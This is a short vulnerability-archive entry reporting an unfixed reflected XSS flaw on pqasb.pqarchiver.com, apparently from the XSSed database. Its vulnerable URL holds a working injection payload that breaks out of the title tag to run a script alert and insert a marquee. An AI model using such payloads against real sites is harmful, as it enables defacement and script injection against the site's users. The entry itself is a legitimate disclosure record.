Unfixed XSS vulnerability at pqasb.pqarchiver.com

2008-01-12T00:00:00
ID XSSED:55064
Type xssed
Reporter Mystick
Modified 2009-01-02T00:00:00

Description

Security researcher Mystick, has submitted on 01/12/2008 a cross-site-scripting (XSS) vulnerability affecting pqasb.pqarchiver.com, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/02/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://pqasb.pqarchiver.com/infotoday/access/1332397541.html?dids=1332397541:1332397541:1332397541&FMT=ABS&FMTS=ABS:FT:PAGE&type=current&date=Sep%2FOct+2007&author=Ernest+Perez&pub=Online&edition=&startpage=34&desc=Managing+the+Information+Explosion+With+Power+Text+Solutions'+Text+Mining+and+Summarization+Software'"></title><script>alert(1337)</script>'"><marquee><h1>Mystick</h1></marquee>